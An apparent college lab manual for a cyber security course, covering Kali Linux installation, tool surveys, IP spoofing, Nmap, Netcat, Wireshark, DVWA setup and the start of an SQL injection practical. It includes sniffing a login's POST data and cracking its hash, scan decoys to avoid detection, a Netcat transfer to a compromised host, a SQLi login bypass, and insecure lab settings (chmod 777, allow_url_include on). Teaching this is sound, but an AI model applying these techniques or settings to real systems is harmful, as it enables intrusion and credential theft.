Cyber Security (3150714) 2021

3150714- Cyber Security AY: 2021-2022

--- INDEX ---

Sr.
Name of Topic Date Sign
No.

Install Kali Linux. Examine the utilities and tools

1 available in Kali Linux and find out which tool is the
best for finding cyber-attack/vulnerability.

Evaluate network defense tools for following

2 (1) IP spoofing
(2) Difference between DDOS attack &
DOS attack.
Explore the Nmap tool and list how it can be used
3
for network defense

4 Explore the NetCat tool.

Use Wireshark tool and explore the packet format

5
and content at each OSI layer.

Configuration and Installation of DVWA - Damn

6
Vulnerable Web Application in Windows/ Linux

7 Examine SQL injection attack.

8 Examine Command Execution attack in DVWA

Examine software keyloggers and hardware

9
keyloggers

Consider a case study of cyber-crime, where the

attacker has performed online fraud. Prepare a
10
report and list the laws that will be implemented on
attacker.

COMPUTER ENGINEERING DEPARTMENT 1

 Cyber Security (3150714) 2021

PRACTICAL – 01
Aim: Install Kali Linux. Examine the utilities and tools available in
Kali Linux and find out which tool is the best for finding cyber-
attack/vulnerability.

Installing Kali Linux

Installing Kali Linux (single boot) on your computer is an easy process. This
guide will cover the basic install (which can be done on bare metal or guest
VM), with the option of encrypting the partition. At times, you may have
sensitive data you would prefer to encrypt using Full Disk Encryption (FDE).
During the setup process you can initiate an LVM encrypted install on either
Hard Disk or USB drives.

First, you’ll need compatible computer hardware. Kali Linux is supported on

amd64 (x86_64/64-Bit) and i386 (x86/32-Bit) platforms. Where possible, we
would recommend using the amd64 images. The hardware requirements
are minimal as listed in the section below, although better hardware will
naturally provide better performance. You should be able to use Kali Linux on
newer hardware with UEFI and older systems with BIOS.

Our i386 images, by default use a PAE kernel, so you can run them on systems
with over 4 GB of RAM.

In our example, we will be installing Kali Linux in a fresh guest VM, without
any existing operating systems pre-installed. We will explain other possible
scenarios throughout the guide.

System Requirements

The installation requirements for Kali Linux will vary depending on what you
would like to install and your setup. For system requirements:

• On the low end, you can set up Kali Linux as a basic Secure Shell (SSH) server
with no desktop, using as little as 128 MB of RAM (512 MB
recommended) and 2 GB of disk space.
• On the higher end, if you opt to install the default Xfce4 desktop and the kali-
linux-default metapackage, you should really aim for at least 2 GB of
RAM and 20 GB of disk space.

COMPUTER ENGINEERING DEPARTMENT 2

 Cyber Security (3150714) 2021

o When using resource-intensive applications, such as Burp Suite, they

recommend at least 8 GB of RAM (and even more if it large web
application!) or using simultaneous programs at the same time.

Installation Prerequisites

This guide will also make the following assumptions when installing Kali Linux:

• Using the amd64 installer image.

• CD/DVD drive / USB boot support.
• Single disk to install to.
• Connected to a network (with DHCP & DNS enabled) which has outbound
Internet access.

We will be wiping any existing data on the hard disk, so please backup any
important information on the device to an external media.

Preparing for the Installation

1. Download Kali Linux (We recommend the image marked Installer).

2. Burn The Kali Linux ISO to DVD or image Kali Linux Live to USB drive. (If
you cannot, check out the Kali Linux Network Install).
3. Backup any important information on the device to an external media.
4. Ensure that your computer is set to boot from CD/DVD/USB in your
BIOS/UEFI.

Kali Linux Installation Procedure

Boot

1. To start your installation, boot with your chosen installation medium.

You should be greeted with the Kali Linux Boot screen. Choose
either Graphical install or Install (Text-Mode). In this example, we
chose the Graphical install.

COMPUTER ENGINEERING DEPARTMENT 3

 Cyber Security (3150714) 2021

Language

2. Select your preferred language. This will be used for both the setup
process and once you are using Kali Linux.

3. Specify your geographic location.

COMPUTER ENGINEERING DEPARTMENT 4

 Cyber Security (3150714) 2021

4. Select your keyboard layout.

Network

5. The setup will now probe your network interfaces, looks for a DHCP
service, and then prompt you to enter a hostname for your system. In
the example below, we’ve entered kali as our hostname.

COMPUTER ENGINEERING DEPARTMENT 5

 Cyber Security (3150714) 2021

• If there isn’t a DHCP service running on the network, it will ask you to
manually enter the network information after probing for network
interfaces, or you can skip.
• If Kali Linux doesn’t detect your NIC, you either need to include the
drivers for it when prompted, or generate a custom Kali Linux ISO with
them pre-included.
• If the setup detects multiple NICs, it may prompt you which one to use
for the install.
• If the chosen NIC is 802.11 based, you will be asked for your wireless
network information before being prompted for a hostname.

6. You may optionally provide a default domain name for this system to
use (values may be pulled in from DHCP or if there is an existing
operating system pre-existing).

COMPUTER ENGINEERING DEPARTMENT 6

 Cyber Security (3150714) 2021

User Accounts

7. Next, create the user account for the system (Full name, username and
a strong password).

COMPUTER ENGINEERING DEPARTMENT 7

 Cyber Security (3150714) 2021

Clock

8. Next, set your time zone.

COMPUTER ENGINEERING DEPARTMENT 8

 Cyber Security (3150714) 2021

Disk

9. The installer will now probe your disks and offer you various choices,
depending on the setup.

In our guide, we are using a clean disk, so we have four options to pick from.
We will select Guided - the entire disk, as this is the single boot installation
for Kali Linux, so we do not want any other operating systems installed, so we
are happy to wipe the disk.

If there is a pre-existing data on the disk, you will have an extra

option (Guided - use the largest continuous free space) than the example
below. This would instruct the setup not to alter any existing data, which is
perfect for dual booting into another operating system. As this is not the case
in this example, it is not visible.

Experienced users can use the “Manual” partitioning method for more granular
configuration options, which is covered more in our BTRFS guide.

If you want to encrypt Kali Linux, you can enable Full Disk Encryption (FDE),
by selecting Guided - used entire disk and setup encrypted LVM. When
selected, later in the setup (not in this guide) prompt you to enter a password
(twice). You will have to enter this password every time you start up Kali
Linux.
COMPUTER ENGINEERING DEPARTMENT 9
 Cyber Security (3150714) 2021

10. Select the disk to be partitioned.

11. Depending on your needs, you can choose to keep all your files in
a single partition - the default - or to have separate partitions for one
or more of the top-level directories.

If you’re not sure which you want, you want “All files in one partition”.

COMPUTER ENGINEERING DEPARTMENT 10

 Cyber Security (3150714) 2021

12. Next, you’ll have one last chance to review your disk configuration
before the installer makes irreversible changes. After you click Continue,
the installer will go to work, and you’ll have an almost finished
installation.

COMPUTER ENGINEERING DEPARTMENT 11

 Cyber Security (3150714) 2021

Encrypted LVM

If enabled in the previous step, Kali Linux will now start to perform a secure
wipe of the hard disk, before asking you for a LVM password.

Please sure a strong password, else you will have to agree to the warning
about a weak passphrase.

Proxy Information

13. Kali Linux uses a central repository to distribute applications.

You’ll need to enter any appropriate proxy information as needed.

COMPUTER ENGINEERING DEPARTMENT 12

 Cyber Security (3150714) 2021

Metapackages

14. Next you can select which metapackages you would like to install.
The default selections will install a standard Kali Linux system and you
don’t really have to change anything here.

Please refer to this guide if you prefer to change the default selections.

Boot Information

15. Next confirm to install the GRUB boot loader.

COMPUTER ENGINEERING DEPARTMENT 13

 Cyber Security (3150714) 2021

16. Select the hard drive to install the GRUB bootloader in (it does
not by default select any drive).

Reboot

17. Finally, click Continue to reboot into your new Kali Linux
installation.

COMPUTER ENGINEERING DEPARTMENT 14

 Cyber Security (3150714) 2021

Post Installation

Now that you’ve completed installing Kali Linux, it’s time to customize your
system.

The General Use section has more information, and you can also find tips on
how to get the most out of Kali Linux in our User Forums.

• Introduction to Kali Linux tools list

• Kali Linux tools list is defined as a list of tools present in Kali Linux
distribution, which aids users to perform penetration testing and
understand that Kali Linux is the most recommended distribution for
ethical hackers around the world. But the utilization of the tool is just
not restricted to ethical hacking, but even for a webmaster, many of
these tools are equally efficient and worthy. These tools aid users in
penetration testing by enabling their task in testing, hacking or anything
which is part of digital forensics. No matter who is using the tools or
what specifics of utility space of the tools, the list we are going to discuss
here caters to the top tools in Kali Linux!

• List of Kali Linux tools and explanation of each:

• In Kali Linux, there are a bunch of tools that we will talk about comes
pre-installed. In case you don’t find the tools in the distribution pre-
installed, one can easily download the same and install it to easily use
it for the utility! We will make sure that the list we mention here takes
care of all the penetration testing cycle procedures, i.e.,

COMPUTER ENGINEERING DEPARTMENT 15

 Cyber Security (3150714) 2021

Reconnaissance, scanning, Exploitation, post-exploitation. We will try to

focus on some important tools, as talking about all might be an endless
discussion due to the vastness of tools present. Without much further
ado, let us kickstart the list modelled into sub-groups in accordance with
their utilities.

1. Gathering Information
• TracerRoute: This is a utility in Kali Linux which enables users in
network diagnostic. It shows up the connection route and as well as
measures the delays in transit of the packets across an IP network.

• WhatWeb: This utility enables the utility of information gathering and

is like a website fingerprint. It is analogous to an interrogation agent
who tries to interrogate a website in getting answers to what that
website is built of. To help WhatWeb, there are 1800 plugins, each
having their own utility.
• Nmap: Another frequently used tool is Nmap that is used for network
discovery and auditing of security. Options are present, which notifies
of each open port available on the target.
• Dirbuster: As the name signifies, this tool is to bust hidden objects,
files or even directories present in a website. A dictionary-based attack
is launched with a set of preconfigured lists of words, and the response
is analyzed to find the hidden gem!

2. Analysis of Web Application

• SQLiv: This tool is one of the most common ones used for simple and
massive vulnerability scanner of SQL injection. This is one of the few
ones in the list that doesn’t come pre-installed in Kali Linux distribution
but is still the most widely used!
• BurpSuite: This is another addition to the web application analysis,
which itself comprises of a collection of tools that are bundled to form a
single suite of web application’s security testing starting from the
scratch, i.e., analysis of the attack surface.
• OWASP-ZAP: This is a Java based tool for testing the web application’s
security which promises an intuitive GUI to perform tasks that include
fuzzing, spidering, scripting etc., along with the presence of several
plugins to ease of the task in hand.

COMPUTER ENGINEERING DEPARTMENT 16

 Cyber Security (3150714) 2021

3. Analysis of Vulnerability

• Nikto: One of the common tools used for assessing vulnerability and
security threats. This tool has the capability to scan for 6500+ files or
programs, which can be potentially dangerous.

4. Password attacks

• Hash-identifier: This tool helps users in the identification of various

hashes that are used for the encryption of data and passwords. Along
with his tool, another tool named findmyhash is used for cracking the
data using online services. Let’s say we receive an encrypted text; it is
put through hash-identifier to figure out the hash type attached to it and
then later findmyhash cracks the data to its original string.
• Crunch: This tool is like a utility that allows users to create custom
wordlists. With a standard character set or with a specified one, all sort
of permutation and combination is generated for the utility of password
attacks.
• John the Ripper: Another widely used offline password cracking
service that combines a lot of password crackers into a single package.
It takes care of identifying the hash type, customization cracker and
many such more and that too in offline mode

5. Assessing Database

• SQLMap: This is one of the most widely used tools for database
assessment as the process of detection and exploitation of
vulnerabilities present in SQL injection, which can lead to taking over of
database. For carrying on with this, we might need to find a website that
is SQL injection vulnerable, for which another tool discussed above,
SQLiv, will come in handy!

6. Wireless attack

• Aircrack-NG suite: As the name suggests that this is a suite, a

scanner, WEP and WPA/WPA2-PSK cracker, a packet sniffer and an
analysis tool is threaded together to carry out tasks to crack or identify
vulnerabilities in any wireless mediums! This tool consists of 16 sub-
tools to carry on with the utility.
• Fluxion: This is like the creation of a clone of the target Wi-Fi network.
Now when a user connects to the wireless network, an authentication
window pops up, and the user enters the password, which is then
captured henceforth!

COMPUTER ENGINEERING DEPARTMENT 17

 Cyber Security (3150714) 2021

7. Spoofing & Sniffing

• Wireshark: This is another great and widely used network analyzer tool
for auditing security. Wireshark performs general packet filtering by
using display filters, including the one to grab a captured password.
• BetterCAP: Another great tool for performing man in the middle attacks
against a network. This is achieved by manipulation of HTTP, HTTPS,
TCP traffic in real-time, credential sniffing and many such more to carry
out such attacks!

8. Keeping anonymity

• MacChanger: When one is performing the different tasks mentioned

above, we must make sure that our identity is not disclosed, and it will
just be foolish if any prevention is overlooked. This tool enables
changing of the user’s MAC address so as to keep the identity
anonymous!

COMPUTER ENGINEERING DEPARTMENT 18

 Cyber Security (3150714) 2021

PRACTICAL – 02
Aim: Evaluate network defense tools for following (i) IP spoofing
(ii) Difference between DDOS attack & DOS attack.

(i)IP Spoofing

IP Spoofing is essentially a technique used by a hackers to gain

unauthorized access to Computers. Concepts of IP Spoofing was initially
discussed in academic circles as early as 1980. IP Spoofing types of attacks
had been known to Security expert on the theoretical level. It was primarily
theoretical until Robert Morris discovered a security weakness in the TCP
protocol known as sequence prediction. Occasionally IP spoofing is done to
mask the origins of a Dos attack. In fact, Dos attacks often mask actual IP
address from where attack has originated from.

Process:
With IP spoofing, intruder sends message to a computer system with an IP
address indicating message is coming from a different IP address than its
coming from. If intent is to gain unauthorized access, then Spoof IP address
will be that of a system the target considers a trusted host. To Successfully
perpetrate an IP Spoofing attack, hacker must find IP address of a machine
that the target System Considers a trusted source. Hackers might employ a
variety of techniques to find an IP address of a trusted host. After they have
obtained trusted IP address, they can then modify packet headers of their
transmission, so it appears that the packet coming from the host.

Different ways to address IP Spoofing include:

1. Do not reveal any information regarding your internal IP addresses. This

helps prevent those addresses from being “spoofed”.
2. Monitor incoming IP packets for signs of IP spoofing using network
monitoring software. One popular product is “Netlog”, is alongside similar
products, seeks incoming packets to the external interface that have both
source and destination IP addresses in your local domain. This essentially
means an incoming packet that claims to be from inside network is coming
from outside your network. Finding one means that an attack is underway.

Danger that IP spoofing contains is that some firewalls do not examine

packets that appear to come from an internal IP address. Routing packets

COMPUTER ENGINEERING DEPARTMENT 19

 Cyber Security (3150714) 2021

through filtering router is possible, if they are not configured to filter

incoming packets whose source address is in local domain.

Examples of router configurations that are potentially

vulnerable include:

1. Routers to external networks that support multiple internal interfaces.

2. Proxy firewalls where the proxy applications use source IP address for
authentication.
3. Router with two interfaces support sub-netting on the internal network.
4. Routers that do not filter packets whose source address is in the local
domain.

(ii) Difference between DOS and DDOS attack

DOS DDOS
DOS stands for Denial Of Service DDOS stands for Distributed Denial
attack. Of Service attack.

DOS attack single system targets the In DDOS multiple systems attacks
victim system. the victim system.

DOS attack is slower than DDOS DDOS attack is faster than DOS
attack. attack.

It can be blocked easily as only one It is difficult to block this attack as

system is used. multiple devices are sending packets
and attacking from multiple
locations.
In DDOS attack, only single device is In DDOS attack, Bots are used to
used with DOS attack tools. attack at the same time.

DOS attacks are easy to trace. DDOS attacks are difficult to trace.

Volume of traffic on DOS attack is DDOS attacks allow the attacker to

less as compared to DDOS. send massive volumes of traffic to
the victim network.
Types of DOS attacks are: Types of DDOS attacks are:
1.Buffer overflow attacks 1.Volumetric attacks
2.Ping of Death or ICMP flood 2.Fragmentation attacks

COMPUTER ENGINEERING DEPARTMENT 20

 Cyber Security (3150714) 2021

3.Teardrop attack 3.Application layer attacks

Victim PC is loaded from the packet Victim PC is loaded from the packet
of data sent from a sender location. of data send from multiple location.

Conclusion:

1. IP spoofing attacks are becoming less frequent.

2. Primarily because the Venues they use have become more Secure and, in
some case, no longer used.
3. Spoofing can still be used, and all security administrators should address
it.

COMPUTER ENGINEERING DEPARTMENT 21

 Cyber Security (3150714) 2021

PRACTICAL – 03
Aim: Explore the Nmap tool and list how it can be used for network
defense

NMAP/ZenMap:

Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform

(Linux, Windows, Mac OS X, BSD, etc.) free and open-source application which
aims to make Nmap easy for beginners to use while providing advanced
features for experienced Nmap users. Frequently used scans can be saved as
profiles to make them easy to run repeatedly. A command creator allows
interactive creation of Nmap command lines. Scan results can be saved and
viewed later. Saved scan results can be compared with one another to see
how they differ. The results of recent scans are stored in a searchable
database.

How it works:

You can install zenmap using the following apt-get command:

COMPUTER ENGINEERING DEPARTMENT 22

 Cyber Security (3150714) 2021

It sends commands to the platform-specific nmap executable and pipes the

output back. Zenmap makes it easy to build out command line options like
this.

It ships with some handy pre-set profiles, such as Intense scan, which scans
hosts with “all advanced/aggressive options,” Quick scan, which scans hosts
without those advanced options, and Slow comprehensive scan, which is
exactly as it sounds.
Type the following command to start zenmap:

COMPUTER ENGINEERING DEPARTMENT 23

 Cyber Security (3150714) 2021

Defining a target:

• Every scan must be associated to a specific target, which can be a single host,
an interval range of hosts, or a full subnet. You can do a network ip range
scan like, by specifying target as :
• https://www.linkedin.com/redir/invalid-link-
page?url=192%2e168%2e233%2e0%2F24

• Reporting window: Zenmap provides different tabs for reporting on scan

results.

• Profile: Frequently used scans can be saved as profiles to make them easy
to run repeatedly.

• Scan: To initiate scan based on current configuration as displayed on GUI

window.

• Command: Not a fan of command line tools? Command creator allows

interactive creation of Nmap command lines.

COMPUTER ENGINEERING DEPARTMENT 24

 Cyber Security (3150714) 2021

Useful tools:

The Compare Results tool provides an interface for differentiating between

two scans, which can be used to monitor daily changes in network topology
or available hosts.
• Saving scans
This comes in handy when you perform a large scan and do not want to repeat
the scan again later while reviewing results.

A sample XML report generated by Zenmap

Custom profiles:

The Profile Editor window contains the following tabs:

• Profile: The name and description of your profile

• Scan: The most important tab, where you can specify targets, scan type (TCP,
UDP, IP), timing template, and much more

• Ping: Specifies ping behaviour. You can suppress pings or build a specific
ICMP packet

COMPUTER ENGINEERING DEPARTMENT 25

 Cyber Security (3150714) 2021

• Scripting: Include nmap scripts in your scan. Zenmap comes with many
useful scripts

• Target: Allows for greater target specification flexibility, including excluded

hosts, target list files, and fast scan support

• Source: Specify how you would like the scanner to behave with respect to
scanning identity, IP address, port, and interface

• Other: Includes options for verbosity level, TTL, and other scanner behaviors

• Timing: Defines timing profile with respect to maximum scan time, scan
delay, and timeouts, among other things
Using saved profiles also ensures that when comparing two scan results you
are working from the same scan options. One of my favorite options in Source
tab is to use decoys to hide identity. Decoys lessens the chances of being
caught and does it even better when used in conjunction with IP spoofing (also
available in source tab).

Use the Profile Editor to develop custom profiles that meet your enterprise
needs

COMPUTER ENGINEERING DEPARTMENT 26

 Cyber Security (3150714) 2021

PRACTICAL – 04

Aim: Explore the NetCat tool.

Netcat is a great network utility for reading and writing to network connections
using the TCP and UPD protocol. Netcat is often referred to as the Swiss army
knife in networking tools and we will be using it a lot throughout the different
tutorials on Hacking Tutorials. Most common use for Netcat when it comes to
hacking is setting up reverse and bind shells, piping and redirecting network
traffic, port listening, debugging programs and scripts and banner grabbing.
In this tutorial we will be learning how to use the basic features from Netcat
such as:
• Banner grabbing
• Raw connections
• Webserver interaction
• File transfers

We will demonstrate these techniques using a couple virtual machines running

Linux and through some visualization.
Banner Grabbing, raw connections and webserver
interaction:

Service banners are often used by system administrators for inventory taking
of systems and services on the network. The service banners identify the
running service and often the version number too. Banner grabbing is a
technique to retrieve this information about a particular service on an open
port and can be used during a penetration test for performing a vulnerability
assessment. When using Netcat for banner grabbing you make a raw
connection to the specified host on the specified port. When a banner is
available, it is printed to the console. Let’s see how this works in practice.
Netcat banner grabbing:

The following command is used the grab a service banner (make a raw
connection to a service):

COMPUTER ENGINEERING DEPARTMENT 27

 Cyber Security (3150714) 2021

Let’s try this on the FTP service on Metasploitable 2 which is running on port
21:

As we can see there is a vsFTPD service running on port 21. Have a look at
the service enumeration tutorial if you want to learn more about this subject
Netcat raw connection:

To demonstrate how a raw connection works we will issue some FTP

commands after we’re connected to the target host on the FTP service. Let’s
see if anonymous access is allowed on this FTP server by issuing the USER
and PASS command followed by anonymous.

This example demonstrates how to grab a banner and how to setup and use
a raw data connection. In this example we’ve used an FTP service but this also
works on other services such as SMTP and HTTP services.
Web server interaction:

Netcat can also be used to interact with webservers by issuing HTTP requests.
With the following command we can grab the banner of the web service
running on Metasploitable 2:
COMPUTER ENGINEERING DEPARTMENT 28
 Cyber Security (3150714) 2021

And then run this HTTP request:

The webserver responds with the server banner: Apache/2.2.8 (Ubuntu)

DAV/2 and the PHP version.
To retrieve the top-level page on the webserver we can issue the following
command:

COMPUTER ENGINEERING DEPARTMENT 29

 Cyber Security (3150714) 2021

And then run this HTTP request:

File transfers with Netcat:

In this example we will be using a Netcat connection to transfer a text file.

Let’s assume we have remote command execution on the target host, and we
want to transfer a file from the attack box to the host. First, we would need
to set up a listener on the target host and connect to it from the attack box.
We will be using port 8080 for this purpose and we safe the file to the desktop:

COMPUTER ENGINEERING DEPARTMENT 30

 Cyber Security (3150714) 2021

As we can see here the contents of the files are equal which means it has been
transferred from the attack box to the target host.

COMPUTER ENGINEERING DEPARTMENT 31

 Cyber Security (3150714) 2021

Conclusion:

In the first part of the Hacking with Netcat tutorials we have learned how to
work with several basic features like raw connections, banner grabbing and
file transfers. We have learned how to grab service banners which contain
information about the service running on the specific port.
We have also learned how to interact with services by using raw connections
and Netcat. In the tutorial we have gained anonymous access to an FTP server
using a raw data connection and issued some FTP commands. We have also
learned how to use Netcat for interaction with a webserver.
We can retrieve webpages and send HTTP requests. Finally, we have learned
how to transfer files from one box to another with Netcat.

COMPUTER ENGINEERING DEPARTMENT 32

 Cyber Security (3150714) 2021

PRACTICAL – 05

Aim: Use Wireshark tool and explore the packet format and
content at each OSI layer.

Wireshark is the world’s foremost network protocol analyzer. It lets you see
what’s happening on your network at a microscopic level. It is the de facto
(and often de jure) standard across many industries and educational
institutions.
This tutorial can be an angel and also devil in the same time, it depends to
you who use this tutorial for which purpose…me as a writer of this tutorial just
hope that all of you can use it in the right way, because I believe that no one
from you want your password sniffed by someone out there so don’t do that
to others too
Disclaimer:

Our tutorials are designed to aid aspiring pen testers/security enthusiasts in

learning new skills, we only recommend that you test this tutorial on a system
that belongs to YOU. We do not accept responsibility for anyone who thinks
it’s a good idea to try to use this to attempt to hack systems that do not belong
to you.
Requirements:
• Wireshark Network Analyzer (wireshark.org)

• Network Card (Wi-Fi Card, LAN Card, etc.) FYI: for wi-fi it should support
promiscuous mode

Step 1:

Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to

Application > Kali Linux > Top 10 Security Tools >

Wireshark

COMPUTER ENGINEERING DEPARTMENT 33

 Cyber Security (3150714) 2021

In Wireshark go to Capture > Interface and tick the interface that applies
to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.

Ideally you could just press Start button here and Wireshark will start
capturing traffic. In case you missed this, you can always capture traffic by
going back to

Step 2:

Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing them. I
opened a browser and signed in a website using my username and password.
When the authentication process was complete and I was logged in, I went
back and stopped the capture in Wireshark.
when wee type in your username, password and press the Login button, it
generates a a POST method (in short – you’re sending data to the remote
server).
To filter all traffic and locate POST data, type in the following in the filter
section
http.request.method == “POST”
See screenshot below. It is showing 1 POST event.

COMPUTER ENGINEERING DEPARTMENT 34

 Cyber Security (3150714) 2021

Step 3:

Analyze POST data for username and password Now right click on that line and select
Follow TCP Steam

This will open a new Window that contains something like this:

COMPUTER ENGINEERING DEPARTMENT 35

 Cyber Security (3150714) 2021

So, in this case,

username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91
But hold on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real
password. It must be a hash value.
to crack this password its simple just open new terminal window and type
this:

COMPUTER ENGINEERING DEPARTMENT 36

 Cyber Security (3150714) 2021

and its looks like this:

username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

Conclusion:

Wireshark is a great piece of free open-source software for network

monitoring, and it is a fantastic packet sniffer. It was created by Gerald
Combs a computer science graduate during his education period. In late
1990’s it was known as Ethereal which was used to capture and analyze
packets.

COMPUTER ENGINEERING DEPARTMENT 37

 Cyber Security (3150714) 2021

PRACTICAL – 06

AIM: Configuration and Installation of DVWA - Damn Vulnerable

Web Application in Windows.

Step 1 - Downloading and installing XAMPP.

Download Xampp from https://www.apachefriends.org/download.html

Now Install xampp.

Now go to xampp control panel and start services apacha2 and Mysql.

COMPUTER ENGINEERING DEPARTMENT 38

 Cyber Security (3150714) 2021

Step 2 - Downloading and Installing DVWA.

Download DVWA from http://www.dvwa.co.uk/

After downloading Extract, you zip file, and you will be presented with a folder
like this.

COMPUTER ENGINEERING DEPARTMENT 39

 Cyber Security (3150714) 2021

Now copy that folder and paste it to, where you have installed xampp. Inside that
xampp folder you will find a folder name htdocs.
Paste your DVWA folder inside that htdocs folder and rename your folder to dvwa.

COMPUTER ENGINEERING DEPARTMENT 40

 Cyber Security (3150714) 2021

Now inside that dvwa folder you will find a folder name config. Inside that
config folder you will find a file name config.inc.php.dist type file.

You must convert that file type dist to php like connfig.inc.php.

COMPUTER ENGINEERING DEPARTMENT 41

 Cyber Security (3150714) 2021

Now open that config.inc.php file into Notepad.Inside

that file you will find something like this,

COMPUTER ENGINEERING DEPARTMENT 42

 Cyber Security (3150714) 2021

$DVWA[‘db_password’] =’p@ssw0rd’;

You must remove that password and make it blank like this,
$DVWA[‘db_password’] =’’; and save it.

Note: If using blank password shows error then try using password you haveset
for SQL Database

COMPUTER ENGINEERING DEPARTMENT 43

 Cyber Security (3150714) 2021

Now go to your web browser and type localhost/dvwa and you will be presentedwith
dvwa default.

COMPUTER ENGINEERING DEPARTMENT 44

 Cyber Security (3150714) 2021

Now click on Create/reseat Database and you will be redirectto

localhost/dvwa/login.php page

COMPUTER ENGINEERING DEPARTMENT 45

 Cyber Security (3150714) 2021

Username: admin
password: password
Once you enter username and password you will be redirected
to localhost/dvwa/index.php

COMPUTER ENGINEERING DEPARTMENT 46

 Cyber Security (3150714) 2021

IMPORTANT NOTE - Initially Start with low level and start to hacking!

COMPUTER ENGINEERING DEPARTMENT 47

 Cyber Security (3150714) 2021

You can do that by clicking on the “DVWA security” tab. You should select
security level to “low” and submit it. like this,

COMPUTER ENGINEERING DEPARTMENT 48

 Cyber Security (3150714) 2021

AIM: Configuration and Installation of DVWA - Damn Vulnerable

Web Application in Linux.

In Linux environment localhost files are stored in /var/www/html directory, so

we open a terminal and change our directory to that directory using following
command:

cd /var/www/html

Here we clone DVWA from it's Github repository. To clone it we run following
command:

git clone https://github.com/ethicalhack3r/DVWA

After the cloning complete, we rename the DVWA to dvwa (it is not necessary,
but it will save our effort).

mv DVWA dvwa

Then we change the permission on dvwa directory by using following

command:

COMPUTER ENGINEERING DEPARTMENT 49

 Cyber Security (3150714) 2021

chomp -R 777 dvwa/

Now we have to setup this web application to run properly for that we have to
go into /dvwa/config directory.

cd dvwa/config

Using ls command, we can the list of files.

ls

In the above screenshot we can see the config.inc.php.dist file. This file
contains default configuration. We need to make a copy of this file with .php
extension name, we are coping this file because in future if anything goes
wrong then we have the default values. So we copy this file with .php
extension name using following command:

COMPUTER ENGINEERING DEPARTMENT 50

 Cyber Security (3150714) 2021

cp config.inc.php.dist config.inc.php

Then we check the copied file using ls command:

ls

Then we use nano editor to make changes on our newly created PHP file.

nano config.inc.php

The screenshot is following:

COMPUTER ENGINEERING DEPARTMENT 51

 Cyber Security (3150714) 2021

We will make changes in this part the p@ssw0rd to pass and the user from
root. Watch the following screenshot:

Then we save it using CTRL+X and press Y to save changes and Enter button
to save and exit. The next is configuring the database.

Here we have opened a new terminal window closing the previous one. We
start the MySQL at first using following command:

service mysql start

If there are no errors that means the service is started.

Now let's login to mysql using following command:

mysql -u root -p

Here in our Kali Linux root is our superuser name, if we have something else
then we need to change that user.

COMPUTER ENGINEERING DEPARTMENT 52

 Cyber Security (3150714) 2021

In the password field we press Enter without typing password; because we

didn't set any password for it, now mysql will open like following screenshot:

Now to setup a database, we start with creating a new user by applying

following command:

create user 'user'@'127.0.0.1' identified by 'pass';

Here using this command, we are creating a user called 'user' running server
on 127.0.0.1(localhost) and the password is 'pass'. Remember that this
username and password should exactly same as the password and username
we have entered in the configuration file of dvwa web application.

In the screenshot we can see the query is OK. That means the user is created.

Then we grant this user all the privileges over the database. For that we type
following command:

grant all privileges on dvwa.* to 'user'@'127.0.0.1' identified by 'pass';

COMPUTER ENGINEERING DEPARTMENT 53

 Cyber Security (3150714) 2021

Yes, we have finished the work of database, now we configure the server. For
this we need to configure our apache2 server. Let's change our directory to
/etc/php/7.3/apache2

Here we are using version 7.3, if we use another version then the path might
be change.

cd /etc/php/7.3/apache2

Here we configure the php.ini file using leafpad of any good text editor. We
have used mousepad editor.

mousepad php.ini

We need to change the allow_url_fopen and allow_url_include values. We set

both of them 'On'. In some cases when we are first time configuring it, we
might find that one of this or both of this configuration is set to 'Off'. We have
turned both of these configuration to 'On', as the following screenshot:

COMPUTER ENGINEERING DEPARTMENT 54

 Cyber Security (3150714) 2021

Then we save and close the file.

Then we start the apache2 server using following command:-

service apache2 start

Let's open the browser and navigate to 127.0.0.1/dvwa/ first open will open
the setup.php as shown in the screenshot.

Here we scroll down and click on "Create/Reset Database".

COMPUTER ENGINEERING DEPARTMENT 55

 Cyber Security (3150714) 2021

Then it will create and configure the database and we redirected to DVWA
login page.

COMPUTER ENGINEERING DEPARTMENT 56

 Cyber Security (3150714) 2021

The default login is

• Username: admin
• Password: password

DVWA have different security levels to change those we navigate to DVWA

security. There are some security levels low, medium, high, impossible. We
can choose difficulty as we need.

Now we can run penetration testing tools and techniques in our

localhost.

This is how we can setup DVWA, Damn Vulnerable Web Application in

our Kali Linux system. This is very helpful for beginners to advanced
users, because of it multi-layered security levels.

COMPUTER ENGINEERING DEPARTMENT 57

 Cyber Security (3150714) 2021

PRACTICAL – 07

Aim: Examine SQL injection attack.

What is SQL injection (SQLi)?

SQL injection is one of the most common attacks used by hackers to exploit
any SQL database-driven web application. It’s a technique where SQL
code/statements are inserted in the execution field with an aim of either
altering the database contents, dumping useful database contents to the
hacker, cause repudiation issues, spoof identity, and much more.
Let’s take a simple scenario where we have a web application with a login
form with username and password fields. If the developer used PHP for
development, the code would look like this:

If a user Karen with the password ‘ 12345 ’ wanted to log in, after clicking the
Submit or the Log in button, the query that would be sent to the database
would look like this:

If an attacker knew the username and wanted to bypass the login window,
they would put something like Karen; -- in the username field. The resulting
SQL query would look like this:

COMPUTER ENGINEERING DEPARTMENT 58

 Cyber Security (3150714) 2021

What the attacker has done, is adding the -- (double-dash) which comments
the rest of the SQL statement. The above query will return the information
entered in the password field making it easier for the attacker to bypass the
login screen.

How to prevent SQL injection

The main reason that makes websites vulnerable to SQL injection attacks can
be traced back to the web development stage. Some of the techniques that
can be implemented to prevent SQL injection include:
• Input validation: If the website allows user input, this input should be
verified whether it’s allowed or not.
• Parametrized queries: This is a technique where the SQL statements are
precompiled and all you must do is supply the parameters for the SQL
statement to be executed.
• Use Stored procedures
• Use character-escaping functions
• Avoid administrative privileges - Don't connect your application to the
database using an account with root access
• Implement a Web application firewall (WAF)
Any penetration tester who wants to get started or advance their skills in SQL
injection will need a vulnerable platform to practice. There are many
vulnerable applications available both for offline and online use.
In this tutorial, we will focus on the Damn Vulnerable Web Application (DVWA).
Pre-requisites
This tutorial expects that you have an up and running DVWA setup. If you
have not yet installed DVWA on your Kali Linux system, please check out the
article which gives a step-by-step guide.

